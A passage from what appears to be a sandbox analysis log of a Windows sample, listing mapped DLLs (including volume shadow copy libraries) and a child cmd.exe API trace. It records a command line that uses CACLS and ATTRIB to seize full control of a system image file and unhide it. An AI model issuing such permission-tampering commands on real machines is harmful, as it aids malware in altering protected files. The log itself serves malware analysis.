"pagefile_0x0000000000970000" filename = "" Region: id = 25538 start_va = 0xdb0000 end_va = 0xdeffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 25539 start_va = 0xf00000 end_va = 0xf3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 25540 start_va = 
0x6dd80000 end_va = 0x6ddcefff entry_point = 0x6dd80000 region_type = mapped_file name = "swprv.dll" filename = "\\Windows\\System32\\swprv.dll" (normalized: "c:\\windows\\system32\\swprv.dll") Region: id = 25541 start_va = 0x6e2c0000 end_va = 0x6e2c6fff entry_point = 0x6e2c0000 region_type = mapped_file name = "fltlib.dll" filename = "\\Windows\\System32\\fltLib.dll" (normalized: "c:\\windows\\system32\\fltlib.dll") Region: id = 25542 start_va = 0x6e440000 end_va = 0x6e449fff entry_point = 0x6e440000 region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 25543 start_va = 0x6f8f0000 end_va = 0x6f8f7fff entry_point = 0x6f8f0000 region_type = mapped_file name = "virtdisk.dll" filename = "\\Windows\\System32\\virtdisk.dll" (normalized: "c:\\windows\\system32\\virtdisk.dll") Region: id = 25544 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 25545 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 25546 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 25547 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 25548 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: 
"c:\\windows\\system32\\cryptbase.dll") Region: id = 25549 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 25550 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25551 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25552 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 25553 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25554 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25555 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 25556 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25557 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = 
"advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25558 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25559 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25560 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 25561 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25562 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25563 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25564 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25565 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25566 start_va = 0x77470000 end_va = 0x77470fff entry_point 
= 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25567 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25568 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25569 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 25570 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 25571 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 25572 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 25573 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 25574 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25575 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25576 start_va = 0xdf0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 25577 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Thread: id = 488 os_tid = 0xcac Thread: id = 489 os_tid = 0xd14 Thread: id = 
490 os_tid = 0xd78 Thread: id = 491 os_tid = 0xc60 Thread: id = 492 os_tid = 0xbe8 Thread: id = 493 os_tid = 0xce8 Thread: id = 610 os_tid = 0xe30 Thread: id = 943 os_tid = 0x5d0 Process: id = "343" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xbf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25578 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25579 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25580 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25581 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 25582 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") 
Region: id = 25583 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25584 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25585 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25586 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 25587 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25588 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25589 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25590 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25591 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 25592 start_va = 0x6a0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 25593 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 
25594 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25595 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25596 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25597 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25598 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25599 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25600 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25601 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25602 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25603 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = 
mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25604 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25605 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 25606 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 25607 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 25608 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 25609 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 25610 start_va = 0x6b0000 end_va = 0x12affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 25611 start_va = 0x12b0000 end_va = 0x1412fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Region: id = 25612 start_va = 0x1420000 end_va = 0x16eefff entry_point = 0x1420000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 494 os_tid = 0xbec [0181.973] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fbfc | out: lpSystemTimeAsFileTime=0x30fbfc*(dwLowDateTime=0xa15e75c0, dwHighDateTime=0x1d440a9)) [0181.973] GetCurrentProcessId () returned 0xbf4 [0181.973] GetCurrentThreadId () returned 0xbec [0181.973] 
GetTickCount () returned 0x342c9 [0181.973] QueryPerformanceCounter (in: lpPerformanceCount=0x30fbf4 | out: lpPerformanceCount=0x30fbf4*=23876256174) returned 1 [0181.974] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0181.974] __set_app_type (_Type=0x1) [0181.974] __p__fmode () returned 0x76b331f4 [0181.974] __p__commode () returned 0x76b331fc [0181.974] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0181.974] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0181.974] GetCurrentThreadId () returned 0xbec [0181.974] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbec) returned 0x38 [0181.974] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0181.974] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0181.974] SetThreadUILanguage (LangId=0x0) returned 0x409 [0181.975] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0181.975] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fb8c | out: phkResult=0x30fb8c*=0x0) returned 0x2 [0181.975] VirtualQuery (in: lpAddress=0x30fbc3, lpBuffer=0x30fb5c, dwLength=0x1c | out: lpBuffer=0x30fb5c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0181.975] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fb5c, dwLength=0x1c | out: lpBuffer=0x30fb5c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0181.975] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fb5c, dwLength=0x1c | out: lpBuffer=0x30fb5c*(BaseAddress=0x211000, 
AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0181.975] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fb5c, dwLength=0x1c | out: lpBuffer=0x30fb5c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0181.975] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fb5c, dwLength=0x1c | out: lpBuffer=0x30fb5c*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0181.975] GetConsoleOutputCP () returned 0x1b5 [0181.975] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0181.975] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0181.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.975] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0181.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.975] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0181.975] _get_osfhandle (_FileHandle=1) returned 0x7 [0181.975] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0181.976] _get_osfhandle (_FileHandle=0) returned 0x3 [0181.976] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0181.976] _get_osfhandle (_FileHandle=0) returned 0x3 [0181.976] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0181.976] GetEnvironmentStringsW () returned 0x400308* [0181.976] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0181.976] GetEnvironmentStringsW () returned 0x400308* [0181.976] FreeEnvironmentStringsW (penv=0x400308) returned 1 [0181.976] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eafc | out: phkResult=0x30eafc*=0x40) returned 0x0 [0181.976] 
RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0xb8, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.976] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x1, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.976] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0x1, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.976] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x0, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.976] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x40, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x40, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0x40, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.977] RegCloseKey (hKey=0x40) returned 0x0 [0181.977] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30eafc | out: phkResult=0x30eafc*=0x40) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", 
lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0x40, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x1, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0x1, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x0, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x9, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x4, lpData=0x30eb08*=0x9, lpcbData=0x30eb00*=0x4) returned 0x0 [0181.977] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eb04, lpData=0x30eb08, lpcbData=0x30eb00*=0x1000 | out: lpType=0x30eb04*=0x0, lpData=0x30eb08*=0x9, lpcbData=0x30eb00*=0x1000) returned 0x2 [0181.977] RegCloseKey (hKey=0x40) returned 0x0 [0181.977] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886390 [0181.977] srand (_Seed=0x5b886390) [0181.977] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All 
Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"" [0181.977] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp\"" [0181.977] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.977] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x401a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0181.978] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0181.978] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0181.978] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0181.978] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0181.978] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0181.978] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0181.978] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0181.978] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0181.978] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0181.978] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0181.978] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0181.978] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0181.978] GetEnvironmentStringsW () returned 0x402458* [0181.978] 
FreeEnvironmentStringsW (penv=0x402458) returned 1 [0181.978] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0181.978] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0181.978] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0181.978] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0181.978] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0181.978] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0181.978] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0181.978] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0181.978] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0181.978] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0181.978] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f8c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0181.978] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f8c8, lpFilePart=0x30f8c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f8c4*="Desktop") returned 0x18 [0181.978] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 